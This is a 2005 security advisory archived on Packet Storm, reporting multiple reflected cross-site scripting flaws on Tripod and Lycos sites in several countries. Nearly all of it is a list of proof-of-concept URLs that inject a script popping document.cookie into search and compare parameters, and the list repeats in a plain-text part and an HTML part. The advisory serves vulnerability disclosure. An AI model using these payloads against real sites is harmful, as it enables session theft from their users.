tripodXSS.txt

2005-03-30T00:00:00
ID PACKETSTORM:36880
Type packetstorm
Reporter Diabolic Crab
Modified 2005-03-30T00:00:00

Description

                                        
                                            `This is a multi-part message in MIME format.  
  
------=_NextPart_000_0005_01C53480.E4D6FC80  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Dcrab 's Security Advisory  
http://icis.digitalparadox.org/~dcrab  
http://www.hackerscenter.com/  
  
Severity: Medium  
Title: Multiple xss vulnerabilities in Tripod.com  
Date: March 30, 2005  
Site: http://www.tripod.com  
  
Summary:  
There are multiple XSS vulnerabilities in the Tripod.com  
  
Proof of Concept Exploit:  
  
http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D&qu=3D&query=3D=  
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D&qu=3D%22%3E%=  
3Cscript%3Ealert(document.cookie)%3C/script%3E&query=3D1  
Pops cookie  
  
  
http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&qu=3D&query=3D1  
Pops cookie  
  
  
http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%3Cscript%3Eal=  
ert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&query=3D1  
Pops cookie  
  
  
http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Ealert(docu=  
ment.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&query=3D1  
Pops cookie  
  
  
http://webhosting.lycos.co.uk/business/compare/?compareId=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E  
Pops cookie  
  
  
http://webhosting.lycos.co.uk/consumer/compare/?compareId=3D"><script>ale=  
rt(document.cookie)</script>  
Pops cookie  
  
  
http://www.multimania.lycos.fr/search/?query=3Dphp&collection=3D"><script=  
>alert(document.cookie)</script>&action=3D1  
Pops cookie  
  
  
http://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1  
Pops cookie  
  
  
http://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D%22%3E%3Cs=  
cript%3Ealert(document.cookie)%3C/script%3E&action=3D1  
Pops cookie  
  
  
http://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1  
Pops cookie  
  
  
http://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1  
Pops cookie  
  
  
http://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1  
Pops cookie  
  
  
http://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1  
Pops cookie  
  
  
http://www.tripod.spray.se/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1  
Pops cookie  
  
  
Author:  
These vulnerabilties have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =  
Lookout for my soon to come out book on Secure coding with php.  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com  
  
iQA/AwUBQkk8ISZV5e8av/DUEQLZzwCg/tGlfLNPtQCbYge2oDUyRJK6RR8AoN2C  
9FDhk4OgSnAljDh8yIdaJ1cj  
=3DqJY/  
-----END PGP SIGNATURE-----  
  
------=_NextPart_000_0005_01C53480.E4D6FC80  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =  
MESSAGE-----<BR>Hash:=20  
SHA1</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20  
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=  
.org/~dcrab</A><BR><A=20  
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=  
/FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2>Severity:  Medium<BR>Title: =  
Multiple xss=20  
vulnerabilities in Tripod.com<BR>Date: March  30,  =  
2005<BR>Site: <A=20  
href=3D"http://www.tripod.com">http://www.tripod.com</A></FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2>Summary:<BR>There are multiple XSS =  
vulnerabilities=20  
in the Tripod.com</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploit:</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2><A=20  
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=  
=3D&qu=3D&query=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/scr=  
ipt%3E">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=  
=3D&qu=3D&query=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/scr=  
ipt%3E</A><BR>Pops=20  
cookie</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV><FONT face=3DArial =  
size=3D2>  
<DIV><BR><A=20  
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=  
=3D&qu=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&qu=  
ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mr=  
c=3D&qu=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&q=  
uery=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=  
=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&qu=3D&qu=  
ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mr=  
c=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&qu=3D&q=  
uery=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%3=  
Cscript%3Ealert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&qu=  
ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%=  
3Cscript%3Ealert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&q=  
uery=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Eal=  
ert(document.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&que=  
ry=3D1">http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Eal=  
ert(document.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&que=  
ry=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://webhosting.lycos.co.uk/business/compare/?compareId=3D%22%3=  
E%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://webhosting.lycos=  
.co.uk/business/compare/?compareId=3D%22%3E%3Cscript%3Ealert(document.coo=  
kie)%3C/script%3E</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D'http://webhosting.lycos.co.uk/consumer/compare/?compareId=3D"><sc=  
ript>alert(document.cookie)</script'>http://webhosting.lycos.co.uk/consum=  
er/compare/?compareId=3D"><script>alert(document.cookie)</scr=  
ipt</A>><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D'http://www.multimania.lycos.fr/search/?query=3Dphp&collection=  
=3D"><script>alert(document.cookie)</script>&action=3D1'>http://www.m=  
ultimania.lycos.fr/search/?query=3Dphp&collection=3D"><script&g=  
t;alert(document.cookie)</script>&action=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%=  
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=  
://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D=  
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">htt=  
p://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D%22%3E%3C=  
script%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%=  
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=  
://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%=  
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=  
://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%=  
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=  
://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%=  
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=  
://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://www.tripod.spray.se/search/?query=3Dphp&collection=3D%=  
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=3D1">http=  
://www.tripod.spray.se/search/?query=3Dphp&collection=3D%22%3E%3Cscri=  
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV><BR>Author:<BR>These vulnerabilties have been found and released by =  
  
Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, =  
please feel=20  
free to contact me regarding these vulnerabilities. You can find me at, =  
<A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=  
.org/~dcrab</A>.=20  
Lookout for my soon to come out book on Secure coding with php.</DIV>  
<DIV> </DIV>  
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =  
for=20  
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>  
<DIV> </DIV>  
<DIV>iQA/AwUBQkk8ISZV5e8av/DUEQLZzwCg/tGlfLNPtQCbYge2oDUyRJK6RR8AoN2C<BR>=  
9FDhk4OgSnAljDh8yIdaJ1cj<BR>=3DqJY/<BR>-----END=20  
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>  
  
------=_NextPart_000_0005_01C53480.E4D6FC80--  
`